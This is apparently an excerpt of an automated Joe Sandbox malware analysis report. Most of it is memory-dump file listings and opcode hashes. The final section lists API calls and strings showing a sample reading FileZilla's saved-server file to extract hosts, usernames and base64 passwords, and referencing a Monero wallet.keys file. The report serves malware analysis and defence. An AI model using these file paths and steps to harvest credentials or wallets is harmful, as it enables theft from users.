                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                        • Instruction ID: 8f8907358ca01554db1dd88375805d2049803cc201f65d1c60d7e52499c0202e
                                        • Opcode Fuzzy Hash: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                        • Instruction Fuzzy Hash: 3AA12C72A01A59CFEB1ACF55CCC1A9ABBB5FB58314F14C62AD41AE72A0D334A944CF50
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                        • Instruction ID: 64dc6a948babd3f818f9d3d5f185530069d983f9e5b28e87fd5e437bc1385181
                                        • Opcode Fuzzy Hash: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                        • Instruction Fuzzy Hash: 30A16D72A087119BD308CF25C89075BF7E2EFC8710F1ACA3DB89997254D7B4E9419B82
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 77449240538ecbbaf4850280d21317eb51a4a9b33477db35bac0bc2197c3aded
                                        • Instruction ID: d6fb0b7162f9a658c4450b0ceab02dc7644a7871edcede083bf5bcbd9cfd7988
                                        • Opcode Fuzzy Hash: 77449240538ecbbaf4850280d21317eb51a4a9b33477db35bac0bc2197c3aded
                                        • Instruction Fuzzy Hash: FC616CF3E093155BF3406A3DCC4472AB6C69BC4724F2F8639EA88E7785E87949064786
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c4209c0623c8021a4756a9901c15762395f145ace1a27711474056553d0d4c91
                                        • Instruction ID: 7e7b19e0f58ee895a6049e1755d939f6bcd1f81135a94dbc93a33ee59c0a9e56
                                        • Opcode Fuzzy Hash: c4209c0623c8021a4756a9901c15762395f145ace1a27711474056553d0d4c91
                                        • Instruction Fuzzy Hash: E15135B250C204EFD3045E28DC8163AB7E4EB54320F26CA2EE7C6D3B40E635D9409B67
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 838354de4dcfa1da1a4c620613b84b29f9c98d8074fe7fa58f42d1f07789aa59
                                        • Instruction ID: 7a7a92e7972345aed702539612136588d01e2b0b89edfa48ec7528253847bd61
                                        • Opcode Fuzzy Hash: 838354de4dcfa1da1a4c620613b84b29f9c98d8074fe7fa58f42d1f07789aa59
                                        • Instruction Fuzzy Hash: 215129F3A086049BE314AA29DC857AABBE6DFD4320F1F853DD7D4D3784F53A48018686
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ff7c6ba518b489ed6f350127ddb8e0bfc615a898a699330b1ff9b6f53c16c997
                                        • Instruction ID: 2dcaa9122320b033609f71172c29e69dbc34dcb25dec7ec616e8d8eedda818af
                                        • Opcode Fuzzy Hash: ff7c6ba518b489ed6f350127ddb8e0bfc615a898a699330b1ff9b6f53c16c997
                                        • Instruction Fuzzy Hash: 075105F3D0C2209FE3586A29DC4577ABBE5EF54720F1A463DE9C8D3380EA7919448686
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6e1af6ee6562652bd35dae2d9e5d89bb5ec4babaf7405b473c7cbae5ebb467f3
                                        • Instruction ID: 33d1a28d95bb46deeaf1f379d12d912a7bfa9c7585d58133c99ad437c41f199c
                                        • Opcode Fuzzy Hash: 6e1af6ee6562652bd35dae2d9e5d89bb5ec4babaf7405b473c7cbae5ebb467f3
                                        • Instruction Fuzzy Hash: 3C41D2F3E087049FF3146E69DC8976BB7D6EB94310F0B453DDAC893680E93859058686
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                         • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                        • Instruction ID: 2624b384d01ecfbfd03e40148cbc9ea3b83e59674d1a58c2070efc83fef09f4d
                                        • Opcode Fuzzy Hash: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                        • Instruction Fuzzy Hash: DE512C62E09BD585C7068B7644502EEBFB25FE6210F1E82DEC4981F383C3759689D3E5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                         • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fa89f657aff6296ecb1601ee23405aced359b6e8af49850df061194d60f6f807
                                        • Instruction ID: 4d4380f719737e920eca18c290049424b63e8615d1407fedd07d3ef3da97591e
                                        • Opcode Fuzzy Hash: fa89f657aff6296ecb1601ee23405aced359b6e8af49850df061194d60f6f807
                                        • Instruction Fuzzy Hash: E5D0C9716097114FC3688F1EB440946FAE8DBD8320715C53FA09AC3750C6B094418B54
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                         • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                        • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                        • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                        • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                        APIs
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                          • Part of subcall function 00988F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00988F9B
                                          • Part of subcall function 0098AC30: lstrcpy.KERNEL32(00000000,?), ref: 0098AC82
                                          • Part of subcall function 0098AC30: lstrcat.KERNEL32(00000000), ref: 0098AC92
                                          • Part of subcall function 0098ABB0: lstrcpy.KERNEL32(?,00990E1A), ref: 0098AC15
                                          • Part of subcall function 0098ACC0: lstrlen.KERNEL32(?,01818C08,?,\Monero\wallet.keys,00990E1A), ref: 0098ACD5
                                          • Part of subcall function 0098ACC0: lstrcpy.KERNEL32(00000000), ref: 0098AD14
                                          • Part of subcall function 0098ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AD22
                                          • Part of subcall function 0098AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0098AAF6
                                          • Part of subcall function 0097A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0097A13C
                                          • Part of subcall function 0097A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0097A161
                                          • Part of subcall function 0097A110: LocalAlloc.KERNEL32(00000040,?), ref: 0097A181
                                          • Part of subcall function 0097A110: ReadFile.KERNEL32(000000FF,?,00000000,0097148F,00000000), ref: 0097A1AA
                                          • Part of subcall function 0097A110: LocalFree.KERNEL32(0097148F), ref: 0097A1E0
                                          • Part of subcall function 0097A110: CloseHandle.KERNEL32(000000FF), ref: 0097A1EA
                                          • Part of subcall function 00988FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00988FE2
                                        • GetProcessHeap.KERNEL32(00000000,000F423F,00990DBF,00990DBE,00990DBB,00990DBA), ref: 009804C2
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 009804C9
                                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 009804E5
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00990DB7), ref: 009804F3
                                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 0098052F
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00990DB7), ref: 0098053D
                                        • StrStrA.SHLWAPI(00000000,<User>), ref: 00980579
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00990DB7), ref: 00980587
                                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 009805C3
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00990DB7), ref: 009805D5
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00990DB7), ref: 00980662
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00990DB7), ref: 0098067A
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00990DB7), ref: 00980692
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00990DB7), ref: 009806AA
                                        • lstrcat.KERNEL32(?,browser: FileZilla), ref: 009806C2
                                        • lstrcat.KERNEL32(?,profile: null), ref: 009806D1
                                        • lstrcat.KERNEL32(?,url: ), ref: 009806E0
                                        • lstrcat.KERNEL32(?,00000000), ref: 009806F3
                                        • lstrcat.KERNEL32(?,00991770), ref: 00980702
                                        • lstrcat.KERNEL32(?,00000000), ref: 00980715
                                        • lstrcat.KERNEL32(?,00991774), ref: 00980724
                                        • lstrcat.KERNEL32(?,login: ), ref: 00980733
                                        • lstrcat.KERNEL32(?,00000000), ref: 00980746
                                        • lstrcat.KERNEL32(?,00991780), ref: 00980755
                                        • lstrcat.KERNEL32(?,password: ), ref: 00980764
                                        • lstrcat.KERNEL32(?,00000000), ref: 00980777
                                        • lstrcat.KERNEL32(?,00991790), ref: 00980786
                                        • lstrcat.KERNEL32(?,00991794), ref: 00980795
                                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00990DB7), ref: 009807EE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                         • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                        • API String ID: 1942843190-555421843
                                        • Opcode ID: 0e04f4695f47aa499d5b3715de49ebcb6c517c7ca0ca082a10616fc0ea2a50b3
                                        • Instruction ID: ef3b1fa8ba5b0b52d75621cddf23a2d25ed7d07e6fc6d82f97dcdd0925bab355
                                        • Opcode Fuzzy Hash: 0e04f4695f47aa499d5b3715de49ebcb6c517c7ca0ca082a10616fc0ea2a50b3
                                        • Instruction Fuzzy Hash: CDD13C75900209ABDB04FBE4DD96FEE7339BF95300F408559F106B6291EF78AA48CB61
